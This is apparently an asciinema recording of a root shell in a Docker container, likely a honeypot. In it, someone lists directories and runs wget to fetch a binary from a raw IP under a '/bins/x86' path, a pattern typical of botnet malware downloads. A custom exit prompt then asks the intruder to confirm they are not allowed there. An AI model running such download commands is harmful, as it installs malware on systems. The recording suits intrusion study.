{"version": 2, "width": 80, "height": 24, "timestamp": 1762936416, "env": {"SHELL": "/bin/bash", "TERM": "xterm-256color"}}
[0.006871, "o", "\u001b[?2004h\u001b]0;root@34c9b480da00: ~\u0007root@34c9b480da00:~# "]
[1.009126, "o", "c"]
[1.143116, "o", "d"]
[1.230398, "o", " "]
[2.151059, "o", "/"]
[2.415103, "o", "\r\n\u001b[?2004l\r"]
[2.415431, "o", "\u001b[?2004h\u001b]0;root@34c9b480da00: /\u0007root@34c9b480da00:/# "]
[2.946937, "o", "l"]
[3.030107, "o", "s"]
[3.142661, "o", " "]
[3.298211, "o", "-"]
[3.514176, "o", "l"]
[3.626453, "o", "a"]
[3.730199, "o", "\r\n\u001b[?2004l\r"]
[3.732563, "o", "total 76\r\ndrwxr-xr-x   1 root root 4096 Nov 12 08:25 \u001b[0m\u001b[01;34m.\u001b[0m\r\ndrwxr-xr-x   1 root root 4096 Nov 12 08:25 \u001b[01;34m..\u001b[0m\r\n-rwxr-xr-x   1 root root    0 Nov 12 08:25 \u001b[01;32m.dockerenv\u001b[0m\r\nlrwxrwxrwx   1 root root    7 Oct  1 02:03 \u001b[01;36mbin\u001b[0m -> \u001b[01;34musr/bin\u001b[0m\r\ndrwxr-xr-x   2 root root 4096 Apr 18  2022 \u001b[01;34mboot\u001b[0m\r\ndrwxr-xr-x   5 root root  360 Nov 12 08:25 \u001b[01;34mdev\u001b[0m\r\ndrwxr-xr-x   1 root root 4096 Nov 12 08:25 \u001b[01;34metc\u001b[0m\r\ndrwxr-xr-x   1 root root 4096 Oct 25 00:00 \u001b[01;34mhome\u001b[0m\r\nlrwxrwxrwx   1 root root    7 Oct  1 02:03 \u001b[01;36mlib\u001b[0m -> \u001b[01;34musr/lib\u001b[0m\r\n"]
[3.732717, "o", "lrwxrwxrwx   1 root root    9 Oct  1 02:03 \u001b[01;36mlib32\u001b[0m -> \u001b[01;34musr/lib32\u001b[0m\r\nlrwxrwxrwx   1 root root    9 Oct  1 02:03 \u001b[01;36mlib64\u001b[0m -> \u001b[01;34musr/lib64\u001b[0m\r\nlrwxrwxrwx   1 root root   10 Oct  1 02:03 \u001b[01;36mlibx32\u001b[0m -> \u001b[01;34musr/libx32\u001b[0m\r\ndrwxr-xr-x   2 root root 4096 Oct  1 02:03 \u001b[01;34mmedia\u001b[0m\r\ndrwxr-xr-x   2 root root 4096 Oct  1 02:03 \u001b[01;34mmnt\u001b[0m\r\ndrwxr-xr-x   1 root root 4096 Nov 12 08:25 \u001b[01;34mopt\u001b[0m\r\ndr-xr-xr-x 232 root root    0 Nov 12 08:25 \u001b[01;34mproc\u001b[0m\r\ndrwx------   1 root root 4096 Nov 12 08:32 \u001b[01;34mroot\u001b[0m\r\ndrwxr-xr-x   1 root root 4096 Nov 12 08:33 \u001b[01;34mrun\u001b[0m\r\nlrwxrwxrwx   1 root root    8 Oct  1 02:03 \u001b[01;36msbin\u001b[0m -> \u001b[01;34musr/sbin\u001b[0m\r\ndrwxr-xr-x   2 root root 4096 Oct  1 02:03 \u001b[01;34msrv\u001b[0m\r\ndr-xr-xr-x  13 root root    0 Nov  4 13:44 \u001b[01;34msys\u001b[0m\r\ndrwxrwxrwt   1 root root 4096 Nov 12 08:33 \u001b[30;42mtmp\u001b[0m\r\ndrwxr-xr-x   1 root root 4096 Oct  1 02:03 \u001b[01;34musr\u001b[0m\r\ndrwxr-xr-x   1 root root 4096 Oct  1 02:10 \u001b[01;34mvar\u001b[0m\r\n"]
[3.732981, "o", "\u001b[?2004h\u001b]0;root@34c9b480da00: /\u0007root@34c9b480da00:/# "]
[8.792589, "o", "w"]
[9.043458, "o", "g"]
[9.238911, "o", "e"]
[9.333975, "o", "t"]
[9.534091, "o", " "]
[9.74296, "o", "\r\n\u001b[?2004l\r"]
[9.746888, "o", "wget: missing URL\r\nUsage: wget [OPTION]... [URL]...\r\n\r\nTry `wget --help' for more options.\r\n"]
[9.747438, "o", "\u001b[?2004h\u001b]0;root@34c9b480da00: /\u0007root@34c9b480da00:/# "]
[11.03806, "o", "w"]
[11.227946, "o", "g"]
[11.400692, "o", "e"]
[11.46974, "o", "t"]
[11.564857, "o", " "]
[16.791325, "o", "\u001b[7mhttp://196.251.88.204/bins/x86\u001b[27m"]
[17.48644, "o", "\r\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[Chttp://196.251.88.204/bins/x86\r\n\u001b[?2004l\r"]
[17.489095, "o", "--2025-11-12 08:33:54--  http://196.251.88.204/bins/x86\r\nConnecting to 196.251.88.204:80... "]
[27.777312, "o", "^C"]
[27.777739, "o", "\r\n"]
[27.777856, "o", "\u001b[?2004h\u001b]0;root@34c9b480da00: /\u0007root@34c9b480da00:/# "]
[50.093834, "o", "\u001b[7mwget github.com\u001b[27m"]
[50.59507, "o", "\b\b\b\b\b\b\b\b\b\b\b\b\b\b\bwget github.com\r\n\u001b[?2004l\r"]
[50.597742, "o", "--2025-11-12 08:34:27--  http://github.com/\r\nResolving github.com (github.com)... "]
[50.599334, "o", "140.82.121.4\r\nConnecting to github.com (github.com)|140.82.121.4|:80... "]
[53.303683, "o", "รง"]
[54.990136, "o", "^C"]
[54.990935, "o", "\r\n"]
[54.991159, "o", "\u001b[?2004h\u001b]0;root@34c9b480da00: /\u0007root@34c9b480da00:/# "]
[55.623424, "o", "c"]
[55.717547, "o", "l"]
[55.804313, "o", "e"]
[55.943057, "o", "a"]
[56.034535, "o", "r"]
[56.155579, "o", "\r\n\u001b[?2004l\r"]
[56.157876, "o", "\u001b[H\u001b[2J\u001b[3J"]
[56.158344, "o", "\u001b[?2004h\u001b]0;root@34c9b480da00: /\u0007root@34c9b480da00:/# "]
[58.148594, "o", "w"]
[58.435508, "o", "g"]
[58.634779, "o", "e"]
[58.860578, "o", "t"]
[59.61485, "o", " "]
[60.453712, "o", "d"]
[60.532851, "o", "i"]
[60.649434, "o", "s"]
[60.808948, "o", "c"]
[60.882505, "o", "o"]
[60.951865, "o", "r"]
[61.177183, "o", "d"]
[61.386033, "o", "."]
[61.564257, "o", "c"]
[61.647687, "o", "o"]
[61.7122, "o", "m"]
[63.516572, "o", "\b\u001b[K"]
[64.039258, "o", "\b\u001b[K"]
[64.100947, "o", "\b\u001b[K"]
[64.19554, "o", "\b\u001b[K"]
[64.290755, "o", "\b\u001b[K"]
[64.356319, "o", "\b\u001b[K"]
[64.451951, "o", "\b\u001b[K"]
[64.521237, "o", "\b\u001b[K"]
[64.620568, "o", "\b\u001b[K"]
[64.68546, "o", "\b\u001b[K"]
[64.775984, "o", "\b\u001b[K"]
[64.867167, "o", "\b\u001b[K"]
[64.933366, "o", "\b\u001b[K"]
[65.023053, "o", "\b\u001b[K"]
[65.126429, "o", "\b\u001b[K"]
[65.191141, "o", "\b\u001b[K"]
[65.286689, "o", "\u0007"]
[65.377041, "o", "\u0007"]
[65.447952, "o", "c"]
[65.538634, "o", "l"]
[65.633707, "o", "e"]
[65.776794, "o", "a"]
[65.875606, "o", "r"]
[65.971639, "o", "\r\n\u001b[?2004l\r"]
[65.973436, "o", "\u001b[H\u001b[2J\u001b[3J"]
[65.973712, "o", "\u001b[?2004h\u001b]0;root@34c9b480da00: /\u0007root@34c9b480da00:/# "]
[67.341738, "o", "e"]
[67.501332, "o", "x"]
[67.566582, "o", "i"]
[67.656773, "o", "t"]
[67.721533, "o", "\r\n\u001b[?2004l\r"]
[67.724101, "o", "Enter 'im not allowed to be here' to confirm: "]
[69.112314, "o", "i"]
[69.212652, "o", "m"]
[69.320717, "o", " "]
[69.451928, "o", "n"]
[69.494925, "o", "o"]
[69.585889, "o", "t"]
[69.668843, "o", " "]
[69.781165, "o", "a"]
[69.845998, "o", "l"]
[69.954426, "o", "l"]
[70.096594, "o", "o"]
[70.187304, "o", "w"]
[70.247752, "o", "e"]
[70.394637, "o", "d"]
[70.503919, "o", " "]
[70.677615, "o", "t"]
[70.716892, "o", "o"]
[70.826306, "o", " "]
[70.956302, "o", "b"]
[71.043145, "o", "e"]
[71.133745, "o", " "]
[71.264743, "o", "h"]
[71.359748, "o", "e"]
[71.421461, "o", "r"]
[71.512078, "o", "e"]
[71.599986, "o", "\r\n"]
[71.600215, "o", "I know...\r\n"]
[71.601056, "o", "Where are you from? "]
[73.981669, "o", "L"]
[74.116338, "o", "3"]
[74.238739, "o", "m"]
[74.355342, "o", "o"]
[74.425887, "o", "n"]
[74.494994, "o", "t"]
[74.673383, "o", "r"]
[74.83897, "o", "e"]
[74.981473, "o", "e"]
[75.089794, "o", "\r\n"]
